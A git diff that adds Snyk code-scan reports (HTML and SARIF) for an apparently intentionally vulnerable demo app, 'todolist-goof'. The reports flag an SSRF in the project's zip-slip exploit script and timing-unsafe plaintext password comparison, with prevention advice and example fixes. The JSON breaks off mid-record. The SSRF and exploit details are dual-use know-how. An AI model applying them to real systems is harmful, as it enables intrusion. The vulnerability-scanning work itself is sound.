  • Ensure that passwords are never stored in plain text, even for "purely internal" use.
    • +
  • Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.
    • +
  • Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.
    • +
  • To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.
    • +
+
+
+
+
+
+
+
+
+

Server-Side Request Forgery (SSRF)

+
+ Data Flow + Fix Analysis +
+
+
    +
  • SNYK-CODE
    • +
  • CWE-918
    • +
+
+
+
+

Unsanitized input from a command line argument flows into requests.post, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.

+
Found in: todolist-goof/exploits/zip-slip.py (line : 13)
+
+
+

Data Flow

+
todolist-goof/exploits/zip-slip.py
+
+ 10:8 +
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ Source + 0 +
+ +
+ 10:8 +
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 1 +
+ +
+ 10:8 +
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 2 +
+ +
+ 10:8 +
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 3 +
+ +
+ 10:7 +
url =
(sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 4 +
+ +
+ 10:1 +

url = (sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 5 +
+ +
+ 13:15 +
requests.post(
url, files=files)
+ + 6 +
+ +
+ 13:1 +

requests.post(url, files=files)
+ Sink + 7 +
+
+
+

Fix Analysis

+

Details

+

In a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.

+

Best practices for prevention

+
    +
  • Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.
    • +
  • Use authentication even within your own network to prevent exploitation of server-side requests.
    • +
  • Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.
    • +
  • Ideally, avoid sending server requests based on user-provided data altogether.
    • +
  • Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.
    • +
  • Disable suspect and exploitable URL schemas. Common culprits include obscure and little-used schemas such as file://, dict://, ftp://, and gopher://.
    • +
+
+
+
+
+
+
+
+ + + \ No newline at end of file diff --git a/snyk.yaml b/snyk.yaml new file mode 100644 index 0000000000..be61b78ae6 --- /dev/null +++ b/snyk.yaml @@ -0,0 +1,5 @@ +version: 2 +customFilters: + filter: ".vulnerabilities |= map(if .type == \"license\" and .title == \"LGPL-2.0 license\" then empty else . end)" + pass: "[.vulnerabilities[] | select(.type != \"license\")] | length" + msg: "Vulnerabilities found" diff --git a/test-command.json b/test-command.json new file mode 100644 index 0000000000..6d4c11ff6e --- /dev/null +++ b/test-command.json @@ -0,0 +1,1421 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "SnykCode", + "semanticVersion": "1.0.0", + "version": "1.0.0", + "rules": [ + { + "id": "python/Ssrf", + "name": "Ssrf", + "shortDescription": { + "text": "Server-Side Request Forgery (SSRF)" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "\n## Details\nIn a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.\n\n## Best practices for prevention\n* Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.\n* Use authentication even within your own network to prevent exploitation of server-side requests.\n* Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.\n* Ideally, avoid sending server requests based on user-provided data altogether.\n* Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.\n* Disable suspect and exploitable URL schemas. Common culprits include obscure and little-used schemas such as `file://`, `dict://`, `ftp://`, and `gopher://`.", + "text": "" + }, + "properties": { + "tags": [ + "python", + "Ssrf", + "Security", + "SourceNonServer", + "SourceLocalEnv", + "SourceCLI", + "Taint" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/commit/23ad832af741f0354949a72e6c6f799eb9d2bace?diff=split#diff-7efee2ee97af01f846ed5818e84c955c51bd8efe06588e0dfa341c68966d945fL-1", + "lines": [ + { + "line": " parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"Downloads and unpacks assets\")\n", + "lineNumber": 31, + "lineChange": "removed" + }, + { + "line": " parser.add_argument(\"zip_url\", action=\"store\", type=str, help=\"URL of the assets package\")\n", + "lineNumber": 32, + "lineChange": "removed" + }, + { + "line": " args = parser.parse_args()\n", + "lineNumber": 33, + "lineChange": "removed" + }, + { + "line": " url = \"https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/releases/download/v1.1.2/scenes.zip\"\n", + "lineNumber": 31, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " request = requests.get(args.zip_url, stream=True)\n", + "lineNumber": 36, + "lineChange": "removed" + }, + { + "line": " request = requests.get(url, stream=True)\n", + "lineNumber": 34, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/yask123/Instant-Movie-Streamer/commit/0b66df24286da3df144b8874cb40db4c6ddf5c6c?diff=split#diff-92c6c2b7103c0f894cf5a1c09b289b8251c1c260eb20cb9027189a2a0eee5d99L-1", + "lines": [ + { + "line": "def get_magnet_link(movie_name = 'harry potter'):\n", + "lineNumber": 32, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 33, + "lineChange": "added" + }, + { + "line": " URL = 'https://www.skytorrents.in/search/all/ed/1/?q='+movie_name.replace(' ', '+')\n", + "lineNumber": 34, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": "def get_torrent_url(search_url):\n", + "lineNumber": 40, + "lineChange": "removed" + }, + { + "line": " \"\"\"Grabs the best matched torrent URL from the search results.\"\"\"\n", + "lineNumber": 41, + "lineChange": "removed" + }, + { + "line": " search_request_response = requests.get(search_url, verify=False)\n", + "lineNumber": 42, + "lineChange": "removed" + }, + { + "line": " soup = BeautifulSoup(search_request_response.text, 'html.parser')\n", + "lineNumber": 43, + "lineChange": "removed" + }, + { + "line": " movie_page = 'https://kat.cr' + (soup.find_all(\"a\", class_=\"cellMainLink\")[0].get('href'))\n", + "lineNumber": 44, + "lineChange": "removed" + }, + { + "line": " resp = requests.get(URL)\n", + "lineNumber": 36, + "lineChange": "added" + }, + { + "line": " soup = BeautifulSoup(resp.text, 'html.parser')\n", + "lineNumber": 37, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/hacktoolkit/django-htk/commit/01df728743a36721d7659247a3e3b9907133ffee?diff=split#diff-eec36e337287f60f4a26ec5ed80b77d0234217d0de7dab8846fe3a39048cef9fL-1", + "lines": [ + { + "line": "GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", + "lineNumber": 23, + "lineChange": "removed" + }, + { + "line": "GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", + "lineNumber": 24, + "lineChange": "removed" + }, + { + "line": "GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", + "lineNumber": 25, + "lineChange": "removed" + }, + { + "line": "from htk.utils import htk_setting\n", + "lineNumber": 23, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 24, + "lineChange": "added" + }, + { + "line": "GOOGLE_GEOCODING_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'\n", + "lineNumber": 25, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", + "lineNumber": 26, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", + "lineNumber": 27, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", + "lineNumber": 28, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 29, + "lineChange": "none" + }, + { + "line": "class Usage(Exception):\n", + "lineNumber": 30, + "lineChange": "none" + }, + { + "line": " def __init__(self, msg):\n", + "lineNumber": 31, + "lineChange": "none" + }, + { + "line": " self.msg = msg\n", + "lineNumber": 32, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 33, + "lineChange": "none" + }, + { + "line": "def main(argv = None):\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " OPT_STR = 'hgr'\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " OPT_LIST = [\n", + "lineNumber": 36, + "lineChange": "none" + }, + { + "line": " 'help',\n", + "lineNumber": 37, + "lineChange": "none" + }, + { + "line": " 'geocode',\n", + "lineNumber": 38, + "lineChange": "none" + }, + { + "line": " 'resolve',\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": " ]\n", + "lineNumber": 40, + "lineChange": "none" + }, + { + "line": " is_geocode = True\n", + "lineNumber": 41, + "lineChange": "none" + }, + { + "line": " if argv is None:\n", + "lineNumber": 42, + "lineChange": "none" + }, + { + "line": " argv = sys.argv\n", + "lineNumber": 43, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 44, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 45, + "lineChange": "none" + }, + { + "line": " progname = argv[0]\n", + "lineNumber": 46, + "lineChange": "none" + }, + { + "line": " opts, args = getopt.getopt(argv[1:],\n", + "lineNumber": 47, + "lineChange": "none" + }, + { + "line": " OPT_STR,\n", + "lineNumber": 48, + "lineChange": "none" + }, + { + "line": " OPT_LIST)\n", + "lineNumber": 49, + "lineChange": "none" + }, + { + "line": " except getopt.error, msg:\n", + "lineNumber": 50, + "lineChange": "none" + }, + { + "line": " raise Usage(msg)\n", + "lineNumber": 51, + "lineChange": "none" + }, + { + "line": " # process options\n", + "lineNumber": 52, + "lineChange": "none" + }, + { + "line": " for o, a in opts:\n", + "lineNumber": 53, + "lineChange": "none" + }, + { + "line": " if o in ('-h', '--help'):\n", + "lineNumber": 54, + "lineChange": "none" + }, + { + "line": " print __doc__\n", + "lineNumber": 55, + "lineChange": "none" + }, + { + "line": " sys.exit(0)\n", + "lineNumber": 56, + "lineChange": "none" + }, + { + "line": " elif o in ('-g', '--geocode'):\n", + "lineNumber": 57, + "lineChange": "none" + }, + { + "line": " is_geocode = True\n", + "lineNumber": 58, + "lineChange": "none" + }, + { + "line": " elif o in ('-r', '--resolve'):\n", + "lineNumber": 59, + "lineChange": "none" + }, + { + "line": " is_geocode = False\n", + "lineNumber": 60, + "lineChange": "none" + }, + { + "line": " if is_geocode and len(args) == 1:\n", + "lineNumber": 61, + "lineChange": "none" + }, + { + "line": " address = args[0]\n", + "lineNumber": 62, + "lineChange": "none" + }, + { + "line": " latitude, longitude = get_latlng(address)\n", + "lineNumber": 63, + "lineChange": "none" + }, + { + "line": " print '%s,%s' % (latitude, longitude,)\n", + "lineNumber": 64, + "lineChange": "none" + }, + { + "line": " elif not is_geocode and len(args) == 2:\n", + "lineNumber": 65, + "lineChange": "none" + }, + { + "line": " latitude = args[0]\n", + "lineNumber": 66, + "lineChange": "none" + }, + { + "line": " longitude = args[1]\n", + "lineNumber": 67, + "lineChange": "none" + }, + { + "line": " address = reverse_geocode(latitude, longitude)\n", + "lineNumber": 68, + "lineChange": "none" + }, + { + "line": " print address\n", + "lineNumber": 69, + "lineChange": "none" + }, + { + "line": " else:\n", + "lineNumber": 70, + "lineChange": "none" + }, + { + "line": " raise Usage('Incorrect arguments')\n", + "lineNumber": 71, + "lineChange": "none" + }, + { + "line": " \n", + "lineNumber": 72, + "lineChange": "none" + }, + { + "line": " except Usage, err:\n", + "lineNumber": 73, + "lineChange": "none" + }, + { + "line": " print >> sys.stderr, err.msg\n", + "lineNumber": 74, + "lineChange": "none" + }, + { + "line": " print >> sys.stderr, \"for help use --help\"\n", + "lineNumber": 75, + "lineChange": "none" + }, + { + "line": " return 3.14159\n", + "lineNumber": 76, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 77, + "lineChange": "none" + }, + { + "line": "def get_latlng(address):\n", + "lineNumber": 78, + "lineChange": "none" + }, + { + "line": " address_query = urllib.quote(address, '')\n", + "lineNumber": 76, + "lineChange": "none" + }, + { + "line": " \n", + "lineNumber": 77, + "lineChange": "none" + }, + { + "line": " values = {\n", + "lineNumber": 78, + "lineChange": "none" + }, + { + "line": " 'format' : 'json',\n", + "lineNumber": 79, + "lineChange": "none" + }, + { + "line": "'sensor' : 'false',\n", + "lineNumber": 80, + "lineChange": "none" + }, + { + "line": "'address' : address_query,\n", + "lineNumber": 81, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 82, + "lineChange": "none" + }, + { + "line": " url = GOOGLE_GEOCODING_API_GEOCODE_URL % values\n", + "lineNumber": 83, + "lineChange": "removed" + }, + { + "line": " response = requests.get(url)\n", + "lineNumber": 84, + "lineChange": "removed" + }, + { + "line": " key = htk_setting('HTK_GOOGLE_GEOCODING_API_KEY', None)\n", + "lineNumber": 83, + "lineChange": "added" + }, + { + "line": " if key:\n", + "lineNumber": 84, + "lineChange": "added" + }, + { + "line": " params['key'] = key\n", + "lineNumber": 85, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 86, + "lineChange": "added" + }, + { + "line": " response = requests.get(GOOGLE_GEOCODING_API_URL, params=params)\n", + "lineNumber": 87, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 4, + "cwe": [ + "CWE-918" + ] + } + }, + { + "id": "java/ReturnsPassword", + "name": "ReturnsPassword", + "shortDescription": { + "text": "Unprotected Storage of Credentials" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "## Details\n\nIf credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.\n\n## Best practices for prevention\n* Ensure that passwords are never stored in plain text, even for \"purely internal\" use.\n* Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.\n* Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.\n* To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.", + "text": "" + }, + "properties": { + "tags": [ + "java", + "ReturnsPassword", + "Security" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-5a57acf4efafddf23331cc9f3c8d724e1cdd01633f61aa2d4e680b9b5241ff71L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 6, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "/**\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": " * @author Shota Oda 2016/11/23.\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": " */\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "@Data\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "@AllArgsConstructor\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "public class BusinessAuthIdentity implements AuthIdentity{\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "\tprivate Lecturer user;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "\tpublic String username() {\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "\t\treturn user.getUsername();\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": "\tpublic String cryptPassword() {\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\t\treturn user.getPassword();\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 25, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\tpublic boolean confirm(String plainPassword) {\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": "\t\treturn cryptPassword().equals(plainPassword);\n", + "lineNumber": 28, + "lineChange": "removed" + }, + { + "line": " return BCrypt.checkpw(plainPassword, cryptPassword());\n", + "lineNumber": 29, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-52010d754aef2fbde5a21bb6e6002096c329060b69306e842cd24a31129752b1L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 6, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "/**\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": " * @author Shota Oda 2016/11/23.\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": " */\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "@Data\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "@AllArgsConstructor\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "public class ConsumerAuthIdentity implements AuthIdentity{\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "\tprivate Student student;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "\tpublic String username() {\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "\t\treturn student.getUsername();\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": "\tpublic String cryptPassword() {\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\t\treturn student.getPassword();\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 25, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\tpublic boolean confirm(String plainPassword) {\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": "\t\treturn cryptPassword().equals(plainPassword);\n", + "lineNumber": 28, + "lineChange": "removed" + }, + { + "line": "\t\treturn BCrypt.checkpw(plainPassword, cryptPassword());\n", + "lineNumber": 29, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/SeraphJACK/SimpleLogin/commit/ff6715f90b9a3e00f7201618ff2f4986c5ebc0f5?diff=split#diff-c79ff75898e7300d5901fce735e57a03db459d401284e7c67ec4711d5adebba4L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 4, + "lineChange": "added" + }, + { + "line": "import top.seraphjack.simplelogin.SLConfig;\n", + "lineNumber": 5, + "lineChange": "none" + }, + { + "line": "import top.seraphjack.simplelogin.SimpleLogin;\n", + "lineNumber": 6, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "import javax.annotation.concurrent.NotThreadSafe;\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": "import java.io.IOException;\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": "import java.nio.charset.StandardCharsets;\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "import java.nio.file.Files;\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "import java.nio.file.Path;\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "import java.nio.file.StandardOpenOption;\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "import java.util.Arrays;\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "import java.util.HashMap;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "import java.util.Map;\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "@NotThreadSafe\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "public class StorageProviderFile implements StorageProvider {\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": " private Gson gson;\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": " private Path path;\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": " private Map entries;\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": " private boolean dirty = false;\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": " StorageProviderFile(Path path) throws IOException {\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": " this.path = path;\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": " this.gson = new Gson();\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": " if (Files.exists(path)) {\n", + "lineNumber": 29, + "lineChange": "none" + }, + { + "line": " entries = new HashMap<>();\n", + "lineNumber": 30, + "lineChange": "none" + }, + { + "line": " Arrays.stream(gson.fromJson(new String(Files.readAllBytes(path), StandardCharsets.UTF_8), POJOUserEntry[].class)).forEach(e -> entries.put(e.username, e));\n", + "lineNumber": 31, + "lineChange": "none" + }, + { + "line": " } else {\n", + "lineNumber": 32, + "lineChange": "none" + }, + { + "line": " if (!Files.exists(path.getParent())) {\n", + "lineNumber": 33, + "lineChange": "none" + }, + { + "line": " Files.createDirectories(path.getParent());\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " entries = new HashMap<>();\n", + "lineNumber": 36, + "lineChange": "none" + }, + { + "line": " Files.createFile(path);\n", + "lineNumber": 37, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 38, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 40, + "lineChange": "none" + }, + { + "line": " @Override\n", + "lineNumber": 41, + "lineChange": "none" + }, + { + "line": " public boolean checkPassword(String username, String password) {\n", + "lineNumber": 42, + "lineChange": "none" + }, + { + "line": " if (entries.containsKey(username)) {\n", + "lineNumber": 43, + "lineChange": "none" + }, + { + "line": " return entries.get(username).password.equals(password);\n", + "lineNumber": 43, + "lineChange": "removed" + }, + { + "line": " return BCrypt.checkpw(password, entries.get(username).password);\n", + "lineNumber": 44, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 2, + "cwe": [ + "CWE-256" + ] + } + } + ] + } + }, + "results": [ + { + "ruleId": "python/Ssrf", + "ruleIndex": 0, + "level": "warning", + "message": { + "text": "Unsanitized input from a command line argument flows into requests.post, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.", + "markdown": "Unsanitized input from {0} {1} into {2}, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.", + "arguments": [ + "[a command line argument](0)", + "[flows](1),(2),(3),(4),(5),(6)", + "[requests.post](7)" + ] + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 13, + "endLine": 13, + "startColumn": 1, + "endColumn": 14 + } + } + } + ], + "fingerprints": { + "0": "c91d074435910f1a76d8677462395e7a7f5317f554c886317059bf72f98d247f", + "1": "3d071b71.889edeb6.ef7ad415.3456c081.056de048.ba14daf2.081ac3f4.8794408a.a6b41d6e.889edeb6.ef7ad415.edcf1db9.c8b7d5cc.48e1de78.a2237efa.f46ed94e" + }, + "codeFlows": [ + { + "threadFlows": [ + { + "locations": [ + { + "location": { + "id": 0, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 8, + "endColumn": 16 + } + } + } + }, + { + "location": { + "id": 1, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 8, + "endColumn": 16 + } + } + } + }, + { + "location": { + "id": 2, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 8, + "endColumn": 19 + } + } + } + }, + { + "location": { + "id": 3, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 8, + "endColumn": 69 + } + } + } + }, + { + "location": { + "id": 4, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 7, + "endColumn": 97 + } + } + } + }, + { + "location": { + "id": 5, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 1, + "endColumn": 97 + } + } + } + }, + { + "location": { + "id": 6, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 13, + "endLine": 13, + "startColumn": 15, + "endColumn": 18 + } + } + } + }, + { + "location": { + "id": 7, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 13, + "endLine": 13, + "startColumn": 1, + "endColumn": 14 + } + } + } + } + ] + } + ] + } + ], + "properties": { + "priorityScore": 534, + "priorityScoreFactors": [ + { + "label": true, + "type": "hotFileCodeFlow" + }, + { + "label": true, + "type": "fixExamples" + } + ], + "isAutofixable": false + } + }, + { + "ruleId": "java/ReturnsPassword", + "ruleIndex": 1, + "level": "warning", + "message": { + "text": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", + "markdown": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", + "arguments": [] + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 250, + "endLine": 250, + "startColumn": 17, + "endColumn": 50 + } + } + } + ], + "fingerprints": { + "0": "321c85af98d01d74e11fa5dbd45f05d79b2a8850b63a02c1da64df28bfa00cdc", + "1": "ec2603c1.d33f1a8f.d308627b.9998adc9.dd06b926.349570c1.6ae0062a.02370d47.ec2603c1.d33f1a8f.fc7d5400.9998adc9.dd06b926.349570c1.6ae0062a.02370d47" + }, + "codeFlows": [ + { + "threadFlows": [ + { + "locations": [ + { + "location": { + "id": 0, + "physicalLocation": { + "artifactLocation": { + "uri": 